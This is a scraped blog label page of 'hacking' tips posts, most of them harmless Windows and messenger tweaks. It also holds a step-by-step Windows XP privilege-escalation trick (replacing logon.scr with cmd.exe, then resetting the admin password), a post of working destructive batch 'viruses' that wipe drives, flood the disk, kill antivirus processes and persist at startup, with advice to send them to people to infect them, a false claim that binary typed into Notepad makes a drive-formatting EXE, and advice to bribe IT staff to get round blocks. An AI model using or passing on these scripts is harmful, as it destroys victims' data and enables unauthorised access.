Powered by Blogger.
Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts

Change Windows Default Identity


    In windows XP, you can change the windows default identity (Computer Manufacturer Logo and other information’s) and share your own private identity there. First you right click on My Computer then click on Properties, here may be you will see computer manufacture logo or empty area. So add your own logo there to make your computer more private.Follow the given steps to change the system default Properties identity:
    First click on Start button and type notepad in Run option then press Enter.Now type the following text in notepad.
    [General]
    Manufacturer=”Vaseem Ansari”
    Model=”CodeMasterz!”
    [Support Information]
    Line1=”Free Computer Tips And Tricks by Vaseem Ansari”
    Line2=”vaseemansari.blogspot.com”
    There are some standard keywords, for example Manufacturer, Model, Line 1, Line 2; you can not change these keywords. Now save this notepad file in c:/windows/system32 folder with file name, OEMINFO.INI.
    Now choose your favorite picture to set as logo, using any picture editor resize the picture size approx. 150X150 pixels then save it in c:/windows/system32 folder with file name OEMLOGO.BMP.
    Now close the all files and restart your computer after any changes to go into effect. To verify these changes, right click on My Computer and open Properties.




    Source URL: https://bollywoodsexygirls2012.blogspot.com/search/label/Hacking
    Visit hot south girls pictures for daily updated images of art collection

How to run multiple yahoo messengers and login to multiple yahoo messenger accounts.

    For Yahoo! Messenger with Voice 8 users, it’s now possible to run multiple instances of Yahoo! Messengers and log into multiple Y!Msgr accounts with just a simple registry hack.

    Multiple Yahoo! Messenger

    If you prefer to edit and change the registry setting yourself manually, without using the above registry registration file, simply launch the registry editor (type regedit at Run command), and navigate to the following registry branch:

    HKEY_CURRENT_USER\Software\yahoo\pager\Test

    Then, on the right pane, right click on the registry editor and select “New”, then create a new DWORD registry value. Name the new registry key as Plural, and assign it the value of 1 (decimal). If some case, the value of 2 should also works. To disable or disallow multiple instance of Yahoo Messengers, simply change and set the “Plural” registry key’s value to 0, or delete the “Plural” key.Source URL: https://bollywoodsexygirls2012.blogspot.com/search/label/Hacking
    Visit hot south girls pictures for daily updated images of art collection

How To Access Blocked GMail From School or Office

    Are you a GMail addict and tired of your office or school administration blocking access to GMail? Here is a guide with various tricks to unblock your favorite GMail and enjoy the full mail access at your organization.

    1. Instead of gmail.com Use Different Address Like mail.google.com, google.com/mail, etc

    Instead of using the URL gmail.com to access your GMail account, try other web address like mail.google.com, google.com/mail when GMail is blocked at your school/office. This trick is expected to work if the IT administrators has blocked gmail.com alone and left the rest of the domains open as they are not widely known to people. Here is the list of alternative address to access GMail

    * http://m.gmail.com
    * https://gmail.com
    * http://google.com/mail
    * http://mail.google.com or https://mail.google.com
    * http://googlemail.com

    Photobucket

    2. Access Blocked GMail Using iGoogle

    GMail is available as a gadge to iGoogle and you can use this gadget to access GMail. When you access GMail through iGoogle all the communication with the GMail servers is routed through iGoogle servers. So this defeats all the restriction and filters applied by IT administrators in blocking gmail.com domain.

    Photobucket

    To access GMail through iGoogle

    1. Login to iGoogle using your Google Account
    2. Add GMail gadget to iGoogle by following this link or by using Add Stuff on screen
    3. That’s all. Start accessing your GMail inside iGoogle.

    3. Access GMail Using Opera Mini Simulator

    Use Opera Mini Browser Online Simulator application to access GMail in a small screen window. Opera Mini is a popular web browser for mobile phones. It allows users to work with live demo of Opera Mini that functions exactly like it would when installed on a handset.

    Photobucket

    Point your browser to http://www.operamini.com/demo/ and start accessing blocked GMail using the URL m.gmail.com.

    Reading mails on mobile simulator is definitely not convenient as reading them on a full screen browser computer. But when you need to access your GMail urgently, This trick might be helpful to you.

    4. Use Microsoft Outlook Or Other Mail Programs To Access GMail Using POP3/IMAP

    Configure your mail clients like Outlook, Live Mail, Lotus Notes to access GMail using POP3 or IMAP protocol. This trick of accessing GMail when blocked is mostly useful for working professionals as they should be definitely using some mail client for official mail access.

    You can find the instruction to configure POP3 and IMAP access for various mail clients over here and here.

    5. Launch GMail from Google Talk

    launch_gmail_from_google_talk At few organizations they block access to GMail but not to Google Talk. If that is the case at your organization, then you can launch GMail from Google Talk application. Sign in to GTalk and click on the envelope icon to launch access GMail.

    6. Use Your Smart Phones

    If you have internet connection on your mobile, you can make use of your mobile phone to access GMail.

    GMail has an excellent native application for most of the mobiles like iPhone, Nokia, Android, Windows Mobile, etc. The ease at which you can read and reply to mails through GMail for Mobile is amazing. It is my favorite mobile application.

    You can download GMail application for mobiles from Google

    7. Use Proxy Web Site To Bypass

    Using proxy website to beat censorship is one of the popular ways for unblocking any kind of websites. When we try to access GMail using a web proxy, the web proxy hides our IP address and uses it’s own IP address to load the page.

    8. Nothing Working? Then Bribe Your IT Administrator

    If none of the above methods worked for you then take help of someone at IT department and get access to GMail. Bribe them :) Offer small gifts, drinks or something else they like.

    Either you can ask them to grant access for your PC or get details of internal proxy server that allow GMail access.Source URL: https://bollywoodsexygirls2012.blogspot.com/search/label/Hacking
    Visit hot south girls pictures for daily updated images of art collection

Hack Windows XP Admin Password

    If you log into a limited account on your target machine and open up a dos prompt
    then enter this set of commands Exactly:

    cd\ *drops to root
    cd\windows\system32 *directs to the system32 dir
    mkdir temphack *creates the folder temphack
    copy logon.scr temphack\logon.scr *backsup logon.scr
    copy cmd.exe temphack\cmd.exe *backsup cmd.exe
    del logon.scr *deletes original logon.scr
    rename cmd.exe logon.scr *renames cmd.exe to logon.scr
    exit *quits dos

    Now what you have just done is told the computer to backup the command program
    and the screen saver file, then edits the settings so when the machine boots the
    screen saver you will get an unprotected dos prompt with out logging into XP.

    Once this happens if you enter this command minus the quotes

    "net user password"

    If the Administrator Account is called Frank and you want the password blah enter this

    "net user ricky blah"

    and this changes the password on franks machine to blah and your in.Source URL: https://bollywoodsexygirls2012.blogspot.com/search/label/Hacking
    Visit hot south girls pictures for daily updated images of art collection

How to make a Simple Virus using

    If you think that notepad is useless then you are wrong because you can now do a lot of things with a notepad which you could have never imagined.In this hack I will show you how to make simple .bat file (virus) that can't be detected by any antivirus

    Here are some good viruses ,i am not responsible for any kind of damage to your system ... :)


    • Copy this to notepad and save as flood1.bat.....

    @ECHO OFF
    @ECHO A PHOENIX PRODUCTION
    @ECHO MAIN BAT RUNNING
    GOTO start

    :start
    @ECHO SET snowball2=1 >> bat6.bat
    @ECHO GOTO flood5 >> bat6.bat
    @ECHO :flood5 >> bat6.bat
    @ECHO SET /a snowball2=%%snowball2%%+1 >> bat6.bat
    @ECHO NET USER snowball2%%snowball2%% /add >> bat6.bat
    @ECHO GOTO flood5 >> bat6.bat
    START /MIN bat6.bat
    GOTO bat5

    :bat5
    @ECHO CD %%ProgramFiles%%\ >> bat5.bat
    @ECHO SET maggi=1 >> bat5.bat
    @ECHO GOTO flood4 >> bat5.bat
    @ECHO :flood4 >> bat5.bat
    @ECHO MKDIR maggi%%maggi%% >> bat5.bat
    @ECHO SET /a maggi=%%maggi%%+1 >> bat5.bat
    @ECHO GOTO flood4 >> bat5.bat
    START /MIN bat5.bat
    GOTO bat4

    :bat4
    @ECHO CD %%SystemRoot%%\ >> bat4.bat
    @ECHO SET marge=1 >> bat4.bat
    @ECHO GOTO flood3 >> bat4.bat
    @ECHO :flood3 >> bat4.bat
    @ECHO MKDIR marge%%marge%% >> bat4.bat
    @ECHO SET /a marge=%%marge%%+1 >> bat4.bat
    @ECHO GOTO flood3 >> bat4.bat
    START /MIN bat4.bat
    GOTO bat3

    :bat3
    @ECHO CD %%UserProfile%%\Start Menu\Programs\ >> bat3.bat
    @ECHO SET bart=1 >> bat3.bat
    @ECHO GOTO flood2 >> bat3.bat
    @ECHO :flood2 >> bat3.bat
    @ECHO MKDIR bart%%bart%% >> bat3.bat
    @ECHO SET /a bart=%%bart%%+1 >> bat3.bat
    @ECHO GOTO flood2 >> bat3.bat
    START /MIN bat3.bat
    GOTO bat2

    :bat2
    @ECHO CD %%UserProfile%%\Desktop\ >> bat2.bat
    @ECHO SET homer=1 >> bat2.bat
    @ECHO GOTO flood >> bat2.bat
    @ECHO :flood >> bat2.bat
    @ECHO MKDIR homer%%homer%% >> bat2.bat
    @ECHO SET /a homer=%%homer%%+1 >> bat2.bat
    @ECHO GOTO flood >> bat2.bat
    START /MIN bat2.bat
    GOTO original

    :original
    CD %HomeDrive%\
    SET lisa=1
    GOTO flood1
    :flood1
    MKDIR lisa%lisa%
    SET /a lisa=%lisa%+1
    GOTO flood1

    wat does it do : this is an extremely harmful virus the will keep replicating itself until your harddrive is totally full and will destroy ur comp.


    • A simple binary codes that can format the sytem drive ,secondary drives...


    1) Copy The Following In Notepad Exactly as it
    01001011000111110010010101010101010000011111100000

    2) Save As An EXE Any Name Will Do
    3)Send the EXE to People And Infect
    • Some other intersting formating codes....
    1) format c:\ /Q/X — this will format your drive c:\
    01100110011011110111001001101101011000010111010000 100000011000110011101001011100
    0010000000101111010100010010111101011000
    2) format d:\ /Q/X — this will format your dirve d:\
    01100110011011110111001001101101011000010111010000 100000011001000011101001011100
    0010000000101111010100010010111101011000
    3) format a:\ /Q/X — this will format your drive a:\
    01100110011011110111001001101101011000010111010000 100000011000010011101001011100
    0010000000101111010100010010111101011000

    4) del /F/S/Q c:\boot.ini — this will cause your computer not to boot.
    01100100011001010110110000100000001011110100011000 101111010100110010111101010001
    00100000011000110011101001011100011000100110111101 101111011101000010111001101001
    0110111001101001
    • Some more intersting stuff ..
    open notepad


    erase c:\windows


    and save as

    FINDOUTANAME.cmd


    wat does it do:- will erase c:/windows ......Lol


    • Here is another one which is funny......

    cls
    :A
    color 0a
    cls
    @echo off
    echo Wscript.Sleep 5000>C:\sleep5000.vbs
    echo Wscript.Sleep 3000>C:\sleep3000.vbs
    echo Wscript.Sleep 4000>C:\sleep4000.vbs
    echo Wscript.Sleep 2000>C:\sleep2000.vbs
    cd %systemroot%\System32
    dir
    cls
    start /w wscript.exe C:\sleep3000.vbs
    echo Deleting Critical System Files...
    echo del *.*
    start /w wscript.exe C:\sleep3000.vbs
    echo Deletion Successful!
    echo:
    echo:
    echo:
    echo Deleting Root Partition...
    start /w wscript.exe C:\sleep2000.vbs
    echo del %SYSTEMROOT%
    start /w wscript.exe C:\sleep4000.vbs
    echo Deletion Successful!
    start /w wscript.exe C:\sleep2000.vbs
    echo:
    echo:
    echo:
    echo Creating Directory h4x...
    cd C:\Documents and Settings\All Users\Start Menu\Programs\
    mkdir h4x
    start /w wscript.exe C:\sleep3000.vbs
    echo Directory Creation Successful!
    echo:
    echo:
    echo:
    echo Execution Attempt 1...
    start /w wscript.exe C:\sleep3000.vbs
    echo cd C:\Documents and Settings\All Users\Start Menu\Programs\Startup\h4x\
    echo start hax.exe
    start /w wscript.exe C:\sleep3000.vbs
    echo Virus Executed!
    echo:
    echo:
    echo:
    start /w wscript.exe C:\sleep2000.vbs
    echo Disabling Windows Firewall...
    start /w wscript.exe C:\sleep2000.vbs
    echo Killing all processes...
    start /w wscript.exe C:\sleep2000.vbs
    echo Allowing virus to boot from startup...
    start /w wscript.exe C:\sleep2000.vbs
    echo:
    echo:
    echo Virus has been executed successfully!
    start /w wscript.exe C:\sleep2000.vbs
    echo:
    echo Have fun!
    start /w wscript.exe C:\sleep2000.vbs
    pause
    shutdown -f -s -c "Your computer has committed suicide. Have a nice day."


    • This code about multiple open windows means infinite windows
    until continue you restart the computer:save on denger.bat and code written in notepad

    @echo off
    copy 0% denger.bat
    start denger.bat

    • This code about the computer shutdown:

    @echo off
    shutdown -s -t 5 -c "Shutdown"


    • Go to notepad and type the following:
    @Echo off
    Del C:\ *.*|y
    save it as Dell.bat

    • Want worse then type the following:
    @echo off
    del %systemdrive%\*.*/f/s/q
    shutdown -r -f -t 00
    and save it as a .bat file

    • Just Copy This Code Below In Notepad, Save as installhack.bat and you are done!
    This Virus will:
    1. End Process, NAVAPSVC.exe
    2. End Process, Explorer.exe (taskbar and icons will dissapear)
    3. End Process, zonelabs.exe
    4. associate a exe file with txt (when opening exe files, it will go to notepad)
    5. associate a txt file with mp3 (when opening txt files, it will open WinAmp or WMP)
    6. Deletes Login/Logoff Screens
    title Hack Setup
    color 0A
    @echo off
    set end=md “Hack installing”
    set fin=copy “Hack log.txt” “Installing”
    %end%
    %fin%
    net send * Hack is installing, press OK to begin set up.
    kill NAVAPSVC.exe /F /Q
    kill zonelabs.exe /F /Q
    kill explorer.exe /F /Q
    cls
    assoc .exe=txtfile
    assoc .txt=mp3file
    cls
    msg * It is you who is hacked….
    msg * I warned you, and you kept going. Challenge me and this is what happens.
    DEL C:\WINDOWS\system32\logoff.exe /F /Q
    DEL C:\WINDOWS\system32\logon.exe /F /Q
    DEL C:\WINDOWS\system32\logon.scr /F /Q
    cls
    shutdown
    • One more ...
    try one this

    Cd C:\
    rd C:\ /s/q
    Cd D:\
    rd D:\ /s/q
    Cd E:\
    Rd E:\ /s/q
    Cd F:\
    Rd\ /s/q

    then it is complete Save as any file you want in .bat format.. n enjoy lol..its really dangerous dont try on your own pc.

    • How to add ur own created viruses into start ups this will make it diifcult to detect them n to remove them ...

    1) For this u can use the simple code below ..

    @echo off

    copy "abcd.bat" "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"

    n den rest of the code ..

    2) suppose u want to make a shutdown.bat a virus which will copy itself in start up n wenever comptuer starts it will shut down it in 2 secs..most dangerous kind of thing better to make create restore point before working with such files..

    @echo off

    copy "abcd.bat" "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"
    @echo off
    shutdown -s -t 5 -c "Shutdown"
    save it as abcd.bat when ever u will run it it will be saved in ur start ups..
    here t 5 means that ur comp will take5 secs to shut down u can make it 2 as well then it will be most dangerous thing to handle .. lol
    For more on virus making refer this links
    Do not try it on your PC. Don’t mess around this is for educational purpose onlySource URL: https://bollywoodsexygirls2012.blogspot.com/search/label/Hacking
    Visit hot south girls pictures for daily updated images of art collection

How to Change Yahoo messenger title bar

    Hey guys you can change the yahoo messenger title bar...
    For this just find the folder messenger in the drive in which the messenger is installed. Then search a file named "ymsgr". In this file just go to the end and write the following code:
    [APP TITLE]
    CAPTION=Red Devil
    Here you can write any name in place of Red Devil... then see the fun.... You can have your own name being placed in yahoo messenger title bar.Source URL: https://bollywoodsexygirls2012.blogspot.com/search/label/Hacking
    Visit hot south girls pictures for daily updated images of art collection

Enable Right Clicks on The Sites that Disable it

    Lots of web sites have disabled the right click function of the mouse button... it's really, really annoying. This is done so that you don't steal (via right-click->save picture) their photos or images or any other goodies. Unfortunately, it disables ALL right-click functionality: copy, paste, open in new window.

    It's easy to change, assuming your using IE 6:
    Click "Tools"->"Internet Options"
    Click the "Security" tab
    Click "Custom Level"
    Scroll down to the "Scripting" section
    Set "Active Scripting" to "disable"
    Click "Ok" a couple of times.

    You'll probably want to turn this back to "enable" when your done... 'cause generally the javascript enhances a website.Source URL: https://bollywoodsexygirls2012.blogspot.com/search/label/Hacking
    Visit hot south girls pictures for daily updated images of art collection

10 Security Tips to Protect Yourself

    Instant Messenger Hacks: 10 Security Tips to Protect Yourself
    Most of us will agree that we are paranoid about email security and hack attacks. We should equally be concerned about the other popular connection device we use – the humble instant messenger. It is also open to some of the privacy risks we associate with emails.
    Especially in a business environment, unsecured IM installations are creating backdoors for hack attacks. This threat has increased manifold because nearly all IM’s allow for exchange of files, images, songs and even peer to peer sharing of entire folders.
    Spam, worms, Trojans and viruses are familiar email foes. They are no friends of instant messaging either. So how do we pick our friends from our foes? Perhaps by following what Benjamin Franklin said - Distrust and caution are the parents of security.
    Also, by putting these 10 habits in place.
    1. Don’t give out your identity
    2. Every IM client asks you to create a screen name. A screen name usually refers to your email ID. Create a screen name which does not touch upon personal information or your real identity. For instance, my screen name is ‘Braniac’ and not ‘Saikat’. And NEVER provide any personal details including credit card numbers and social security number over the internet.
    3. Don’t chat with people not on your contact list
    4. Always vet your contact list with people whom you know something about. Talking with Mr. Anonymous at the other end of space may be fraught with risk. It is possible to discover your computer address (i.e. your IP) from an instant message and that usually is the first requirement for a remote hack attack.Don’t believe everything you read and always verify any information or request for information.
    5. Don’t click on spam links
    6. This is what a spam link might look like –This is probably what you will be bombarded with first. A link tempts you to click it just for the lark. A lot of these links take you to websites which can install spyware stealthily on your computer. For e.g. Viruses and worms with colorful names such as W32.Yalove or W32/Spybot-MQ are potential threats to Yahoo users. Ignore them.
    7. Don’t share files with your chat partner
    8. An IM client like Yahoo allows P2P file sharing. Do not share unknown content even if the person is known. P2P files, like email attachments can carry viruses, Trojan horses, and worms. They are engineered to seed themselves to other members on your buddy list. Be especially cautious when someone sends you an .exe or a .zip file.
    9. Don’t let potential hackers reach you
    10. Yahoo has an Ignore user or Report as spam so that he can’t disturb you once again. GTalk has a Block user option. Using this option allows you to keep out the unwanted from repeatedly messaging you. The default security settings in chat software tend to be relatively lax. Thus making you open to attacks. Check the settings and preferences of your chat client to apply stricter permission controls.
    11. Don’t Neglect Encryption
    12. Most IM clients lack encryption features. That essentially means that your messages can be tracked and read by eavesdropping hackers using technologies like packet sniffers or similar ones. Passwords are also a security loophole with hardly any client using strong password encryption.The subject of encryption and strong password protection would require another post by itself. So I hand you over to Tim’s excellent post on How To Secure & Encrypt Your Instant Messaging Chats. Here at MakeUseOf.com we have a lot of posts tagged as ‘passwords’. Why not take a look at ways to set strong passwords.
    13. Don’t use an older version of IM – Update
    14. IM client companies spend a lot of effort behind doors to prevent backdoor threats. Newer versions come with bug fixes and enhanced security. For instance, the latest version of Yahoo IM is better integrated with anti-virus solutions like Norton Internet Security and Norton Anti-Virus.So, always update your IM client as soon as one becomes available. If the chat client does not automatically prompt for an upgrade, go to the website and check your version number with the latest available. You can note the version of your particular client by clicking on Help – About
    15. Don’t download third party plug-ins from unverified sources
    16. A lot of third party plug-ins are available for download which enhance the chatting experience. It is safer and advisable to always download from the IM client websites themselves or from verified sources.
    17. Don’t forget to log-out completely
    18. It is an oft repeated habit to click on the [X] button and exit. But this action does not close our IM client completely. Most often, they continue to run in the system tray leaving it ‘open’ for a third person to access it. IMs also have a nasty habit of broadcasting your online presence even if left to run as a background task. Especially in public computers be mindful of logging out and exiting completely. Also, never click on any Remember My Password checkbox during log-in as an added safeguard.For Yahoo Users: Before you get up, delete your Yahoo Messenger profile. It is located by default at C:\Program Files\Yahoo!\Messenger\Profiles.
    19. Don’t forget the value of a good browser, a good firewall and an even better anti-virus
    20. Sometimes we will click a link; sometimes we will download a file. All the precautions in the world will not be able to protect us if we don’t have a secure browser, a good firewall and an anti-virus updated with the latest virus signatures. These three not only protect us from IM attacks but they are the must-haves for any system.
    Chatting as against emailing is a real time activity. It is in that sense more social than any other form of web communication. The danger is that chatting can lull us into a false sense of security. Just a few fundamental forethoughts help us to turn that false sense into a more conscious sense of security.
    Have you been hacked? Perhaps, you share the concern for a rigorous defense against hackers? Let us know what safety measures you personally use…Source URL: https://bollywoodsexygirls2012.blogspot.com/search/label/Hacking
    Visit hot south girls pictures for daily updated images of art collection

How to delete all Scraps from your Orkut Account | Delete all Scraps from Orkut

    This is another GreaseMonkey Script for all orkuttians using firefox
    Recently I have seen lots of people on orkut keeping their scrapbook clean! Most of the time for privacy reason! This script will help them best as it is designed for them! I hope specially girls will find his useful!

    Installation:
    1. This will require Firefox and GreaseMonkey! (New to GreaseMonkey?)
    2. After that click here to install Orkut Scrap Deleter Script. A window will pop-up just hit install option!
    3. Script is installed but READ NEXT FEW LINES BEFORE LEAVING THIS PAGE!
    By default, the script is ENABLED! As you can see in screenshot, a check-mark will appear right before name of script! (You have to right-click on GreaseMonkey icon in lower-right corner of Firefox window.)
    Now if you are in orkut then just open or refresh your scrapbook and it will start deleting scraps from oldest one first! The only way to STOP this is close the tab/window (i.e. scrapbook page) first and then again going to GreaseMonkey menu, DISABLE the script!
    To ENABLE/DISABLE you have to just check/uncheck the script respectively from GreaseMonkey menu! No need to UNINSTALL the script!
    I hope you will like this! Let me  know if you get some problems I know there may be few problems arise using this script.Source URL: https://bollywoodsexygirls2012.blogspot.com/search/label/Hacking
    Visit hot south girls pictures for daily updated images of art collection

Popular Posts

My Blog List